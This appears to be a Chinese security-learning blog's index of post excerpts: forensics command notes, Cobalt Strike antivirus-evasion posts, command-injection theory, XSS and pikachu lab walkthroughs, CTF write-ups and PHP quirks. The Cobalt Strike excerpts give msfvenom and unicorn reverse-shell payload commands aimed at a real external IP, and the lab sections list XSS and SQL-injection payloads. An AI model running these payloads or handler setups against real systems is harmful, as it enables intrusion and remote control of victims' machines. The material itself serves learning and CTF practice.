小结
先把各个镜像弄好,有时候一个镜像里面会有另一个镜像,需要导出来,最好还是导出来,不然不能分析
火眼检材的备份文件
分析–证据嵌套识别–
linux命令
权限用户相关
chmod 变更权限
pure 创建虚拟用户
timedatectl 设置或查询系统时间、日期和时区等配置。
网络网站相关
dhclient 刷新网络配置
netstat -anp |grep 80 查看80端口开放情况
python3 -m http.server 2023 在将当前目录映射到2023端口
文件系统相关
ls -al 列出所有文件的详细信息(隐藏文件)
lsblk -f 查看文件系统类型
blkid 查看已格式化分区的 UUID 和文件系统类型
parted -l 查看分区表类型和分区文件系统类型
fdisk -l 查看硬盘分区信息
more /var/log/pptpd.log|grep -C 10 172.16.80.188 读取到172.16.80.188输出前后10行
数据库相关
last 最近登陆数据库
镜像相关
zfs rollback media0/mediastora ...
CS-进阶
免杀0x003-CS-进阶
文章参考:qingan师傅
1https://x9z8oggqty.feishu.cn/docx/F5A6d4el9oeX0HxwaEkcksKgnzf
键盘记录
一样在进程列表选中explorer.exe进行键盘记录
浏览器代理 (仅仅针对IE浏览器)
cs派生联动msf
msf的设置
1use exploit/multi/handler
1set payload windows/meterpreter/reverse_http
1set lhost 120.55.103.132
1set lport 7725
1run
cs里新建监听器
payload选择foreign http
ip和端口选择msf设置的
msf派生联动cs
msf生成一个马
1msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=120.55.103.132 LPORT=7720 -f exe > shell.exe
12345use exploit/multi/handlerset payload window ...
命令执行/代码执行
远程命令执行
命令执行漏洞
应用程序的某些功能需要调用可以执行系统命令的函数,如果这些函数或者函数的参数可以被用户控制,就可能通过命令连接符将恶意命令拼接到正常的函数中,从而随意执行系统命令
代码执行漏洞
应用程序中提供了一些可以将字符串作为代码执行的函数,比如PHP的eval函数,可以将函数中的参数当作PHP代码来执行,如果这些函数的参数控制不严格,可能会被利用,造成任意代码执行
命令连接符
远程命令执行可以用到的命令连接符windows和linux系统各有4个,其中3个是共有的,各有一个是特有的:
windows:| || && &
linux: | || && ;
各连接符含义如下:
|
管道操作符
可以把前一个命令的标准输出传输到后一个命令的标准输出
比如 a | b 表示命令a的输出作为命令b的输入
但在远程命令执行中,不管a的执行结果是否正确,b都可以执行,不会有命令a的输出作为命令b的输入一说
||
逻辑或
注意该命令有短路的情况
比如a||b,如果命令a执行成功,则命令b不会被执行;只有命令a执行失败的情况下,才会执行命令b
&a ...
CS-插件篇
CS-插件篇
参考文章:
1http://sleep.dashnine.org/download/sleep.jar
Sleep环境的搭建
C2:Cobalt Strike,一款多人运动工具,常常使用再后渗透阶段
Aggressor Script:是C2 3.0以上版本的一个内置的脚本语言,他是由Sleep脚本解析,Sleep脚本目前国内是没有中文版本的,可能是因为使用的人不多,在在后面我会去把这个语言进行翻译;在CS 3.0 以上的版本,菜单、选项、事件、都有默认的default.cna构建。我们可以使用一些IRC、Webhook去对接机器人和监控,比如瞎子哥的Server上线监听,以及梼杌等插件的编写,所以本文也会在他们的代码基础上去解释一些东西
由于 Aggressor Script是由Sleep解析的,所以我们先要安装一下这个语言的解释器,这个语言是基于Java的脚本语言
Sleep语言下载地址:http://sleep.dashnine.org/download/sleep.jar
快速使用: java -jar sleep.jar:
输出 hello wor ...
CS-unicorn
免杀0x001
使用 cd 命令切换到新的独角兽目录
1cd /opt/unicorn
生成有效负载
要使用独角兽创建有效负载,请使用以下命令。
123./unicorn.py windows/meterpreter/reverse_https <ATTACKER-IP-ADDRESS> <PORT>./unicorn.py windows/meterpreter/reverse_https 120.55.103.132 443
独角兽将使用Metasploit reverse_https模块使用指定的端口连接到攻击者的IP地址。
监听端口
监听443
12root@iZbp139mvjnm00g2t4ihsoZ:~# nc -lvnp 443Listening on 0.0.0.0 443
当独角兽完成生成有效负载时,将创建两个新文件。第一个是可以使用 cat powershell_attack.txt 命令查看的powershell_attack.txt。这将显示将在目标 Windows 10 计算机上执行并创建计量器连接的 PowerShell 代码。
1 ...
xss-labs
xss-labs
XSS常见的触发标签
第一关
<script>alert(1)</script>
第二关
1"><script>alert(1)</script>
对前端js代码进行闭合
第三关
闭合之后没有通过
参看源码
' onclick ='javascript:alert(1)'//
第四关
" onclick ='javascript:alert(1)'//
第五关
我们发现 onclick与script 都会被加一个下划线.
这时我们要了解一下
javascript伪协议
<a> 标签使用javascript:伪协议吧。通常我们为<a>标签增加href属性,一般有两个目的:
跳转到指定的页面,也就是:link选择器可以选择到它。
有href属性的<a>标签才有cursor:pointer的效果,特别实在低版本浏览器里面。
下面我们主要是聊聊不想要<a>标签跳转到实际页面的几种方法。
<a href="#">&l ...
SkyNICO新生赛
MISC
【福利题】sign sign sign
关注公众号,回复SkyNICO
之后有一个base32编码的flag,解码即可
这里直接复制的话会漏掉最后一个等号,刚好被挡住了。。。当时还一直以为是套娃。。。学长能不能免费给我手机贴膜
【福利题】啊吧啊吧
foremost分离图片即可
希尔伯特的微笑
给了一张图片,名为threebody,三体
刚开始根本没想做,搜了一遍图片和题目名,直接跳过了。但是看到好多人做出来了,于是把题目描述搜了一下,
同样是threebody,进去看看
看虽然看不懂,但是看着挺好玩的,看到最后,,,,,
Pwn
真的nc上去就有flag了
根据描述去nc连一下,命令执行,拿flag
WEB
hardser
EasyPHP
前几关都很简单,最后一关卡住了。
用了之前存的MD5 , WP给的都没成功,还是又生成了一个
123456789101112131415<?phpfunction readmyfile($path){ $fh = fopen($path, "rb"); $data = frea ...
PHP特性
PHP特性
参考文章
CTF/PHP特性汇总-安全客 - 安全资讯平台 (anquanke.com)
0x00:Hash比较缺陷
1PHP`在处理哈希字符串时,通过`!=`或`==`来对哈希值进行比较,它把每一个以`0e`开头的哈希值都解释为`0`,所以如果两个不同的密码经过哈希以后,其哈希值都是以`0e`开头的,那么`PHP`将会认为他们相同,都是`0
审计代码,我们输入的不能相等,但md5却需要相等,这明显的就是利用Hash的比较缺陷来做
我们只要找出两个数再md5加密后都为0e开头的即可,常用的有以下几种
12345678910111213141516QNKCDZO0e830400451993494058024219903391s878926199a0e545993274517709034328855841020s155964671a0e342768416822451524974117254469s214587387a0e848240448830537924465865611904s214587387a0e848240448830537924465865611904s878 ...
pikachu
暴力破解
基于表单的暴力破解
没有验证码,cookie等防御可以直接爆破
验证码绕过(on server)
先看验证码的生存周期
发现只要我们不更换验证码,我们就可以一直提交。
然后爆破
验证码绕过(on client)
发现验证码虽然会更换,但可以一直提交。。。
SQL-Inject
输一个错误的语句看看是否报错
查字段
说明两个回显位
这时把我的数据库给扒下来了。。。。
密码是md5加密
搜索型注入
一样
xx型注入
这个确实学到了,还有加上括号才能闭合。
还有就是如果注入成功了,但是没回显,很大程度上可能是因为语句中schema table column 查询没改。
一个报错
在没有 GROUP BY 的聚合查询中,SELECT 列表的表达式 #1 包含非聚合列“pikachu.message.id”;这与 sql_mode=only_full_group_by 不兼容
一直被挡住了全屏才看到
insert/update
update
1&add='or+updatexml(1,concat('^',(select+grou ...
NKCTF
NKCTF
Crypto
baby_RSA
题目连接
https://pan.baidu.com/s/1gHXugkve5NbHg0n7Zd5KPg?pwd=2023
通过dp求出P,Q,即c1,c2关键是公式变换,
12345678910111213141516RSAn = p*qc1 = m^p mod (p*q)c2 = m^p mod (p*q)费马小定理m^p ≡ m mod (p)m^q ≡ m mod (p)/*个人感觉这里是m<p,那么m^p<p*q,才能有下面的结果*/c1 = m + k1*p + k2*p*q=m+k3*p同理c2 = m +k4*qc1*c2 = m^2 +m(k3*p+k4*q)+ k3*k4*n(c1+c2)m =2(m^2) + m(k3*p+k4*q) 所以m^2 - (c1+c2)m + c1 * c2 = k3 * k4 * m ≡ 0 mod (n) 即构建关于m的多项式,使用coppersmith方法即可
1234567891011121314151617181920212223242526272829n ...